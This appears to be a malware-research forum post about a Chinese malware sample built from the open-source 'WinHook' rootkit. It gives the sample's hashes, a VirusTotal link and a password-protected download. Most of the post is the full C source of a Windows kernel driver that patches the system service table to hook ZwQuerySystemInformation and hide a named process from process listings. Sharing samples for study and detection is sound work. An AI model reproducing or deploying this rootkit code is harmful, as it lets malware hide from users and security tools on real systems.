Piece of malware from China with lolkit on board. It is nothing interesting except fact that it is built from open source lolkit called "WinHook". Malware author only added one more SSDT hook for NtSetInformationFile. Complete source also below.
SHA256: 850f66e860231d8681cdb6531a11eb1d96219181097b092f7ab47dab3a0fe5d7
SHA1: 565280d0883c9b7fc89a55d8bf9ac646f1e3bf33
MD5: 0741d6e8d6008a0461ceae1c9f85ad7f
https://www.virustotal.com/en/file/850f ... /analysis/
SHA256: 850f66e860231d8681cdb6531a11eb1d96219181097b092f7ab47dab3a0fe5d7
SHA1: 565280d0883c9b7fc89a55d8bf9ac646f1e3bf33
MD5: 0741d6e8d6008a0461ceae1c9f85ad7f
https://www.virustotal.com/en/file/850f ... /analysis/
Code: Select all
/* ******************************************************************
Name:WinHook.c
Hook System Service Call In Windows 2000 or later version,Only
for x86 CPU.This Driver Only hide process that you setting!
Copyright (C) ndis 2004, All rights reserved.
****************************************************************** */
#include <ntddk.h>
#include "WinHook.h"
/* ******************************************************************
Macro for easy hook/unhook. On X86 implementations of Zw* func-
tions, the DWORD following the first byte is the system call number,
so we reach into the Zw function passed as a parameter, and pull the
number out. This makes system call hooking depe ndent ONLY on the
Zw* function implementation not changing.
****************************************************************** */
#define SYSCALL(_function) ServiceTable->ServiceTable[*(PULONG)((PUCHAR)_function+1)]
/* Pointer to system global service table */
PSRVTABLE ServiceTable;
#pragma code_seg("ENTRY")
/* Driver Entry */
NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject,IN PUNICODE_STRING RegistryPath)
{
NTSTATUS nRet;
PDEVICE_OBJECT lpHookDeviceObject;
UNICODE_STRING uszDeviceName,uszDriverName;
RtlInitUnicodeString(&uszDeviceName,L"\\Device\\WinHook");
RtlInitUnicodeString(&uszDriverName,L"\\DosDevices\\WinHook");
nRet = IoCreateDevice(
DriverObject, 0,
&uszDeviceName,
FILE_DEVICE_WINHOOK,
0, TRUE,
&lpHookDeviceObject
);
if(NT_SUCCESS(nRet)){
/* Create Symboliclink for GUI */
nRet = IoCreateSymbolicLink (&uszDriverName, &uszDeviceName );
/* Create dispatch points for all routines */
DriverObject->MajorFunction[IRP_MJ_CREATE] =
DriverObject->MajorFunction[IRP_MJ_SHUTDOWN] =
DriverObject->MajorFunction[IRP_MJ_CLOSE] =
DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = DriverDispatch;
DriverObject->DriverUnload = DriverUnload;
}
if(!NT_SUCCESS(nRet)){
DbgPrint("******WinHook:Failed to create device!******\n");
if(lpHookDeviceObject){
IoDeleteDevice(lpHookDeviceObject);
}
IoDeleteSymbolicLink(&uszDriverName);
return nRet;
}
/* Pointer to system table data structure is an NTOSKRNL export */
ServiceTable = KeServiceDescriptorTable;
DbgPrint("WinHook:SystemCallService: %x\n",ServiceTable);
/* Install System Call Hook */
HookSystemCall();
DbgPrint("******WinHook:Hook System Call Service******\n");
return STATUS_SUCCESS;
}
#pragma code_seg()
#pragma code_seg("SETHOOK")
/* Install System Call Hook */
VOID HookSystemCall()
{
RealZwQuerySystemInformation = SYSCALL(ZwQuerySystemInformation);
SYSCALL(ZwQuerySystemInformation) = (PVOID)HookZwQuerySystemInformation;
return;
}
#pragma code_seg()
#pragma code_seg("UNHOOK")
/* Uninstall System Call Hook */
VOID UnhookSystemCall()
{
SYSCALL(ZwQuerySystemInformation) = (PVOID)RealZwQuerySystemInformation;
return;
}
#pragma code_seg()
#pragma code_seg("HOOK")
/* Hook function,hook ZwQuerySystemInformation for hide process you setting. */
NTSTATUS HookZwQuerySystemInformation(
IN ULONG SystemInformationClass,
IN PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength
)
{
NTSTATUS nRet;
UNICODE_STRING uszProcName;
RtlInitUnicodeString(&uszProcName, L"winlogon.exe");
nRet = (RealZwQuerySystemInformation)(
SystemInformationClass,
SystemInformation,
SystemInformationLength,
ReturnLength
);
if(NT_SUCCESS(nRet))
{
if(SystemInformationClass==5)
{
struct _SYSTEM_PROCESSES *lpCurr = (struct _SYSTEM_PROCESSES *)SystemInformation;
struct _SYSTEM_PROCESSES *lpPrev = NULL;
if(lpCurr->NextEntryDelta){
((char *)lpCurr += lpCurr->NextEntryDelta);
}
while(lpCurr)
{
/* Hide the process you setting */
if (RtlCompareUnicodeString(&uszProcName, &lpCurr->ProcessName, 1) == 0)
{
if(lpPrev)
{
if(lpCurr->NextEntryDelta) {
lpPrev->NextEntryDelta += lpCurr->NextEntryDelta;
}
else {
lpPrev->NextEntryDelta = 0;
}
}
else {
if(lpCurr->NextEntryDelta) {
(char *)SystemInformation += lpCurr->NextEntryDelta;
}
else {
SystemInformation = NULL;
}
}
if(lpCurr->NextEntryDelta){
((char *)lpCurr += lpCurr->NextEntryDelta);
}
else {
lpCurr = NULL;
break;
}
} /* if (RtlCompareUnicodeString(&uszProcName, &lpCurr->ProcessName, 1) == 0) */
/* View all over the process list */
if(lpCurr != NULL) {
lpPrev = lpCurr;
if(lpCurr->NextEntryDelta){
((char *)lpCurr += lpCurr->NextEntryDelta);
}
else{
lpCurr = NULL;
}
}
} /* end while(lpCurr) */
} /* End if(SystemInformationClass==5) */
} /* End if(NT_SUCCESS(nRet)) */
return nRet;
}
#pragma code_seg()
#pragma code_seg("PATCH")
/* Driver Dispatch */
NTSTATUS DriverDispatch(IN PDEVICE_OBJECT DeviceObject,IN PIRP Irp)
{
PIO_STACK_LOCATION lpIrpStack;
Irp->IoStatus.Status = STATUS_SUCCESS;
Irp->IoStatus.Information = 0;
/* Get a pointer to the current location in the Irp. */
lpIrpStack =IoGetCurrentIrpStackLocation(Irp);
switch (lpIrpStack->MajorFunction) {
case IRP_MJ_CREATE:
case IRP_MJ_SHUTDOWN:
case IRP_MJ_CLOSE:
case IRP_MJ_DEVICE_CONTROL:
DbgPrint("WinHook Dispatch\n");
break;
}
IoCompleteRequest(Irp,IO_NO_INCREMENT);
return STATUS_SUCCESS;
}
#pragma code_seg()
#pragma code_seg("UNLOAD")
/* Driver Unolad */
VOID DriverUnload(IN PDRIVER_OBJECT DriverObject)
{
UNICODE_STRING uszDriverName;
DbgPrint("******WinHook Driver Unloading******\n");
/* Uninstall System Call Hook */
UnhookSystemCall();
/* Delete the symbolic link for this device */
RtlInitUnicodeString(&uszDriverName,L"\\DosDevices\\WinHook");
IoDeleteSymbolicLink(&uszDriverName);
/* Delete the device object */
IoDeleteDevice( DriverObject->DeviceObject );
DbgPrint("******Deleted devices******\n");
return;
}
#pragma code_seg() Attachments
pass: malware
(14.67 KiB) Downloaded 47 times
(14.67 KiB) Downloaded 47 times
Ring0 - the source of inspiration
